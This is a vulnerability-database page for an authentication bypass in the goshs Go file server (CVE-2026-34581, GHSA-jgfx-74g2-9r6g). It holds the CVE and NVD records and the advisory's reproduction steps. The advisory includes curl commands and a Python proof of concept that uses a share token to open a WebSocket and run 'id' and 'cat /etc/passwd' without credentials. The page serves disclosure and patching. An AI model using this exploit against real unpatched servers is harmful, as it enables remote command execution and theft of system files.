Vulnerability-Lookup

CVE-2026-34581 (GCVE-0-2026-34581)

Vulnerability from cvelistv5 – Published: 2026-04-02 18:04 – Updated: 2026-04-03 17:01

Title

goshs has Auth Bypass via Share Token

Summary

goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CWE

CWE-288 - Authentication Bypass Using an Alternate Path or Channel

Assigner

GitHub_M

References

URL

Tags

	https://github.com/patrickhener/goshs/security/ad…	x_refsource_CONFIRM
	https://github.com/patrickhener/goshs/commit/6fb2…	x_refsource_MISC
	https://github.com/patrickhener/goshs/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	patrickhener	goshs	Affected: >= 1.1.0, < 2.0.0-beta.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34581",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-03T16:19:09.570992Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-03T17:01:54.432Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "goshs",
          "vendor": "patrickhener",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.1.0, \u003c 2.0.0-beta.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-288",
              "description": "CWE-288: Authentication Bypass Using an Alternate Path or Channel",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-02T18:04:35.217Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
        },
        {
          "name": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216"
        },
        {
          "name": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"
        }
      ],
      "source": {
        "advisory": "GHSA-jgfx-74g2-9r6g",
        "discovery": "UNKNOWN"
      },
      "title": "goshs has Auth Bypass via Share Token"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34581",
    "datePublished": "2026-04-02T18:04:35.217Z",
    "dateReserved": "2026-03-30T16:56:30.999Z",
    "dateUpdated": "2026-04-03T17:01:54.432Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34581\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T19:21:32.157\",\"lastModified\":\"2026-04-03T16:10:23.730\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"references\":[{\"url\":\"https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-34581\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-03T16:19:09.570992Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-03T17:00:06.119Z\"}}], \"cna\": {\"title\": \"goshs has Auth Bypass via Share Token\", \"source\": {\"advisory\": \"GHSA-jgfx-74g2-9r6g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"patrickhener\", \"product\": \"goshs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.1.0, \u003c 2.0.0-beta.2\"}]}], \"references\": [{\"url\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g\", \"name\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216\", \"name\": \"https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2\", \"name\": \"https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-288\", \"description\": \"CWE-288: Authentication Bypass Using an Alternate Path or Channel\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-02T18:04:35.217Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-34581\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-03T17:01:54.432Z\", \"dateReserved\": \"2026-03-30T16:56:30.999Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-02T18:04:35.217Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-JGFX-74G2-9R6G

Vulnerability from github – Published: 2026-04-01 20:58 – Updated: 2026-04-06 17:32

Summary

goshs has Auth Bypass via Share Token

Details

Summary

When using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.

Details

The BasicAuthMiddleware checks for a ?token= parameter before checking credentials. If the token exists in SharedLinks, the request passes through with no auth check at all. The handler then processes all query parameters — including ?ws (WebSocket) which has higher priority than ?token.

// middleware.go:22-30 — token check runs FIRST
token := r.URL.Query().Get("token")
if token != "" {
    _, ok := fs.SharedLinks[token]
    if ok {
        next.ServeHTTP(w, r)  // Full auth bypass
        return
    }
}
// ... normal auth checks never reached

A share token is designed for single-file, time-limited downloads. But the middleware bypass grants access to everything — directory listing, file deletion, clipboard, WebSocket, and CLI command execution.

1. Create a webroot:

mkdir -p /tmp/goshs-webroot
echo "shareable file" > /tmp/goshs-webroot/shareable.txt

2. Start goshs with auth + TLS + CLI mode:

/tmp/goshs-test -d /tmp/goshs-webroot -b 'admin:password' -s -ss -c -p 8000

CLI mode requires auth (-b) and TLS (-s -ss). This is the documented usage — not a weakened config.

3. Verify authentication is required:

curl -sk https://localhost:8000/
Not authorized

4. As a legitimate user, create a share link:

curl -sk -u admin:password 'https://localhost:8000/shareable.txt?share'

Response:

{"urls":["https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA"]}

Save the token value (e.g., gMP-w0hXRs-Q-FEZku63kA).

5. Prove the token bypasses auth for WebSocket:

# Without token → 401 (blocked)
curl -sk -o /dev/null -w "%{http_code}" \
  -H "Connection: Upgrade" -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  'https://localhost:8000/?ws'
# 401

# With token → 101 Switching Protocols (auth bypassed!)
curl -sk -o /dev/null -w "%{http_code}" \
  -H "Connection: Upgrade" -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  'https://localhost:8000/?ws&token=gMP-w0hXRs-Q-FEZku63kA'
# 101

For a Full PoC, you can run the python file attached below, it will run id and cat /etc/passwd.

PoC

import json, ssl, websocket

TOKEN = "gMP-w0hXRs-Q-FEZku63kA"  # ← replace with your token

ws = websocket.create_connection(
    f"wss://localhost:8000/?ws&token={TOKEN}",
    sslopt={"cert_reqs": ssl.CERT_NONE},
)
print("[+] Connected WITHOUT credentials!")

# Execute 'id'
ws.send('{"type":"command","Content":"id"}')
import time; time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")
# uid=501(youruser) gid=20(staff) ...

# Execute 'cat /etc/passwd'
ws.send('{"type":"command","Content":"cat /etc/passwd"}')
time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")

ws.close()

A patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34581"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T20:58:48Z",
    "nvd_published_at": "2026-04-02T19:21:32Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen using the `Share Token` it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.\n\n### Details\n\nThe `BasicAuthMiddleware` checks for a `?token=` parameter **before** checking credentials. If the token exists in `SharedLinks`, the request passes through with **no auth check at all**. The handler then processes all query parameters \u2014 including `?ws` (WebSocket) which has higher priority than `?token`.\n\n```go\n// middleware.go:22-30 \u2014 token check runs FIRST\ntoken := r.URL.Query().Get(\"token\")\nif token != \"\" {\n    _, ok := fs.SharedLinks[token]\n    if ok {\n        next.ServeHTTP(w, r)  // Full auth bypass\n        return\n    }\n}\n// ... normal auth checks never reached\n```\n\nA share token is designed for **single-file, time-limited downloads**. But the middleware bypass grants access to everything \u2014 directory listing, file deletion, clipboard, WebSocket, and CLI command execution.\n\n\n**1. Create a webroot:**\n\n```bash\nmkdir -p /tmp/goshs-webroot\necho \"shareable file\" \u003e /tmp/goshs-webroot/shareable.txt\n```\n\n**2. Start goshs with auth + TLS + CLI mode:**\n\n```bash\n/tmp/goshs-test -d /tmp/goshs-webroot -b \u0027admin:password\u0027 -s -ss -c -p 8000\n```\n\n\u003e CLI mode requires auth (`-b`) and TLS (`-s -ss`). This is the documented usage \u2014 not a weakened config.\n\n**3. Verify authentication is required:**\n\n```bash\ncurl -sk https://localhost:8000/\nNot authorized\n```\n\n**4. As a legitimate user, create a share link:**\n\n```bash\ncurl -sk -u admin:password \u0027https://localhost:8000/shareable.txt?share\u0027\n```\n\nResponse:\n```json\n{\"urls\":[\"https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA\"]}\n```\n\nSave the token value (e.g., `gMP-w0hXRs-Q-FEZku63kA`).\n\n**5. Prove the token bypasses auth for WebSocket:**\n\n```bash\n# Without token \u2192 401 (blocked)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n  -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n  -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n  \u0027https://localhost:8000/?ws\u0027\n# 401\n\n# With token \u2192 101 Switching Protocols (auth bypassed!)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n  -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n  -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n  \u0027https://localhost:8000/?ws\u0026token=gMP-w0hXRs-Q-FEZku63kA\u0027\n# 101\n```\n\nFor a Full PoC, you can run the python file attached below, it will run `id` and `cat /etc/passwd`.\n\n\n\n\n### PoC\n\n``` python\nimport json, ssl, websocket\n\nTOKEN = \"gMP-w0hXRs-Q-FEZku63kA\"  # \u2190 replace with your token\n\nws = websocket.create_connection(\n    f\"wss://localhost:8000/?ws\u0026token={TOKEN}\",\n    sslopt={\"cert_reqs\": ssl.CERT_NONE},\n)\nprint(\"[+] Connected WITHOUT credentials!\")\n\n# Execute \u0027id\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"id\"}\u0027)\nimport time; time.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n# uid=501(youruser) gid=20(staff) ...\n\n# Execute \u0027cat /etc/passwd\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"cat /etc/passwd\"}\u0027)\ntime.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n\nws.close()\n```\nA patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.",
  "id": "GHSA-jgfx-74g2-9r6g",
  "modified": "2026-04-06T17:32:15Z",
  "published": "2026-04-01T20:58:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34581"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "goshs has Auth Bypass via Share Token"
}

FKIE_CVE-2026-34581

Vulnerability from fkie_nvd - Published: 2026-04-02 19:21 - Updated: 2026-04-03 16:10

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216
	security-advisories@github.com	https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2
	security-advisories@github.com	https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2."
    }
  ],
  "id": "CVE-2026-34581",
  "lastModified": "2026-04-03T16:10:23.730",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-02T19:21:32.157",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-288"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34581 (GCVE-0-2026-34581)

GHSA-JGFX-74G2-9R6G

Summary

Details

PoC

FKIE_CVE-2026-34581

Tags

Sightings

Nomenclature